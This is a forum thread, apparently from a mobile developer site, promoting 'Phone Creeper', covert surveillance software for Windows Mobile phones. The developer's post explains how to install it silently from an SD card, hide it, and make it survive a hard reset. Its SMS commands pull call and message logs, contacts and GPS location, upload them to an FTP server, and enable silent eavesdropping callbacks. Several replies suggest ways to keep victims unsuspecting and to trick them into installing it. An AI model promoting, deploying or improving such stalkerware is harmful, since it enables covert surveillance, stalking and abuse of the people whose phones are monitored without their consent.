[CLOSED][App][2010.12.13] Phone Creeper V0.98 (BETA) *** Espionage Suite

Status
Not open for further replies.
Search This thread

ilMessia

Nov 29, 2008
No offence to anyone, it's just my curiosity, but why you need a program like this?

solidkundi

Sep 27, 2008
well yes it seems creepy..but this is just a doorway to many other things. I'm hoping it will soon allow me to send a SMS to hard reset and delete everything on the Memory.....just incase i lose the phone and sum1 turns it on..and as soon as the phone receives the txt...BOOM...my secrets are safe with me....

we all have our secrets...

well yes it seems creepy..but this is just a doorway to many other things. I'm hoping it will soon allow me to send a SMS to hard reset and delete everything on the Memory.....just incase i lose the phone and sum1 turns it on..and as soon as the phone receives the txt...BOOM...my secrets are safe with me....

Sprite Terminator already do what you need.

sschrupp

Jul 27, 2008
Iowa
Good way to track your mischeivous kids! Now I just need to find a couple cheap WM phones good for texting to replace the 2 cheap blackberry phones I got them.. lol.

juiceppc

Nov 22, 2005
Please find a way to make this work on Windows Mobile Standard. And a customizable text message. So far this prog is kind of cool. Not perfect but cool.

neva dinova

Mar 20, 2007
austin
when you can hear them can they hear you? maybe the name should be a 1984 reference or spyphone

Last edited:

flaviopac

Jan 10, 2008

:D:D:D:D

Nice stuff man!

fresnogamer

May 14, 2008
Fresno, CA
Remove It?

How do I remove it? I tried it on my Touch Pro running 6.1 fully flashed to Cricket. I am also running S2U2 and it opened the Dialer and locked up. I want to remove it but will not let me because it is running at startup. Any answers?

ilMessia

Nov 29, 2008
How do I remove it? I tried it on my Touch Pro running 6.1 fully flashed to Cricket. I am also running S2U2 and it opened the Dialer and locked up. I want to remove it but will not let me because it is running at startup. Any answers?

Try going to windows/startup and delete the link to the program

chrisque1

Dec 12, 2008
;)

To remove it, you just have to go back to \Windows\StartUp and delete the file. Then reboot.

Some ideas:
1. Turn off the speaker or low the volumen to 0.
2. Turn off the screen, and lock it (not going on again). So if the program detect the long power button press it will turn off the phone by itself. This way the other person dont get suspicious. They will think their phone went off by any reason they want and will restart by themselfs, and we will know that they try to use the phone.
3. Auto delete the call to our phone from history.

:cool:

fortunz

Apr 19, 2009
inside
I might be interested in this as part of a theft recovery plan for my own phone, but I'd obviously want to be able to alter the keyword trigger. Hopefully it's case-sensitive.

A GPS coordinate text-back option would be nice.

chrisque1

Dec 12, 2008
Those are good ideas and i always welcome more. I'll add them to my todo list

I have anotherone, but I don´t even know if it is possible (pls don´t laugh):

*. bluetooth auto-install.

I know the BT-autoinstall may be imposible, so the program can be bundle with some nice backgrounds, or ringtones. So the other person will agree to run the cab without knowing to get the other stuff in their phones.

/ karma loss!

Status
Not open for further replies.

Top Liked Posts

• There are no posts matching your filters.
    STILL GOING!
    Thank You to those who donated, even a small amount is appreciated and helps keep motivation going :>

sniff15
    Jesterfell
    johnnyme (big thanks)
    lucifer_fallen_angel
    cambot5k
    HTC - 2ND
    RavenTBK
    X-Mod
    serveradmnstrtr
    amedeus
    isyami
    radi0chik
    mygoogoo

*** WHAT IT DOES ***

This is a phone espionage suite.
    It can be silently installed by just inserting an sd card with the files below on it.
    The program does not show up under installed programs or running programs and allows for a useful array or features. Phones running this software can be remotely controled by sms text messages. All commands will be silently received and deleted immediately and results will be issued back to sender.
    pre-configured settings can be added to the installer to have your own default password and phone number to receive live updates. By default, this program will silently reinstall itself even after a hard reset, if the memory card with these files is still in the device.

Currently it has the following features:

To receive live updates of SMS and Call activity to your FTP server (setupftp must be set first):
    chetstriker ftplive

To add phone number to your ignore log list (it won't create logs of these numbers)
    chetstriker addign 8005551212

To remove phone number from your ignore log list (it will log this number again)
    chetstriker delign

To receive received call logs, send the following text to phone with this installed on it:
    chetstriker getreccalls
    To view sent call logs (even deleted):
    chetstriker getsentcalls
    To view received SMS logs (even deleted):
    chetstriker getrecsms
    To view sent SMS logs (even deleted):
    chetstriker getsentsms
    To change log size (for calls and sms, default:10 min:5 max:25)
    chetstriker logsize number_between_5_and_25
    To test if phone creeper is running (discreetly):
    helo
    chetstriker turnonringer

To retrieve the external IP Address of your phone, assuming connected:
    chetstriker getip
    To receive last 10 call logs(even if deleted):
    chetstriker getcalllogs
    To receive live SMS notifications on SMS and CALL transactions:
    chetstriker liveon
    To turn off live notifications:
    chetstriker liveoff
    To lock PDA:
    chetstriker lock
    To run a program (exec is the program name):
    chetstriker run exec
    To run a program (exec is the program name, arg is any arguments added):
    chetstriker run exec | arg
    To setup FTP account to retreive without SMS (make sure you add space | space in between):
    chetstriker setupftp url @ user @ pass
    To setup FTP account (use this if not using default port 21):
    chetstriker setupftp url @ user @ pass @ port
    To setup FTP account (use this if ftp not saving to default base path):
    chetstriker setupftp url @ user @ pass @ port @ ftp_path

To receive any log by ftp, you can pre-seed any get command with ftp:
    example:
    chetstriker getcalllogs would become chetstriker ftpgetcalllogs

To add call blocking: (communication either way with specified number will disconnect)
    chetstriker addblk 8005551212
    To add call redirecting: (if phone dials a specific nuumber it will cancel and dial an alternate number instead)
    chetstriker addredir ifthisnumbercalls sendtothisnumber
    To remove call blocks:
    chetstriker delblks
    To remove call redirects:
    chetstriker delredir
    To get contacts: (from memory)
    chetstriker getcontacts
    To get appointments:
    chetstriker getappts
    To get tasks:
    chetstriker gettasks
    To set emergency SMS number:
    chetstriker setemerg 8005551212
    To get phone info: (IMEI, username, email, radio version, etc.)
    chetstriker getinfo
    To get gps location and google maps link:
    chetstriker getpos
    Deletes Contacts, Appointments, Task:
    chetstriker deleteaccts
    Displays command list:
    chetstriker help
    To delete all SMS messages:
    chetstriker delallsms
    To delete received SMS messages:
    chetstriker delrecsms
    To delete sent SMS messages:
    chetstriker delsentsms
    To wipe your storage card:
    chetstriker wipeflash
    To send a fart:
    chetstriker fart
    To send a pop-up message:
    chetstriker message "insert msg here, without quotes"
    To create a silent callback through remote speakerphone:
    chetstriker callback
    To bounce sms off phone to someone else:
    chetstriker bounce sms "phone number to send to" "message to send"
    To send your eaves droping call to someone else:
    chetstriker bounce call "phone number to send to" "message to send"
    To change password:
    chetstriker change "newpassword"
    (Obviously change "newpassword" to be what ever password you want and don't type the quotes.)
    After you have changed your password, make sure you use the new commands accordingly. For example, if I changed the password to yellow and wanted to get call history. I would from now on type:
    yellow getcalls

all results will be sent via SMS back without leaving any trace on the phone being controlled.
    Any cell phone can be used to initiate the commands and all commands will respond with a success message for acknowledgement.

by default the password is "chetstriker", obviously not including the quotes.
    the command structure is (password and then command)

*** HOW TO USE IT ***

-- RemoveCreeper --
    if you have ever installed Phone Creeper, run this to make sure all old files are deleted before installing new version. Just unzip, copy .exe file to PDA and run it from PDA. There is no interface or acknowledgement., it takes about 3 seconds to run. Also make sure the 2577 folder is deleted from your memory card (If you used the silent install method) so that it doesn't automatically reinstall after.

-- Regular Install with uninstall option --
    Just install .cab on wm5 or higher phone, requires .NET CF 3.5.
    MAKE SURE YOU SELECT Device instead of SC card for installation.

-- Silent auto install version (Currently the only method) --
    Unzip 2577 folder to root of storage card. After inserting storage card into PDA, it will automaticaly without notice remove old version, install new version and auto start process so reboot is NOT needed. This will also not add entries to startup or remove programs, so the RemoveCreeper file is needed to remove it in the future if you want.
    To pre-configure default password, create a file named sysinfo.ini with the password you want in caps and place the file in the 2577 folder before inserting into the device.
    To pre-configure enabling the live feature and sending you messages, create a file named live.ini with the phone number you want to receive the live messages (use numbers only) and place the file in the 2577 folder before inserting into the device.

<< Anti-Creeper Project now started as mentioned earlier >>

If you like this program, please feel free to DONATE
    How about calling it The Stalker? :eek:
    will this work with any phone?
    It should work on any WM5 - WM6.5.
    I'm not sure if it will work on previous versions.
    I'm running this on a WM 6.1 now.
    Great .. I love to test it out !!!..

I am running WM 6.5...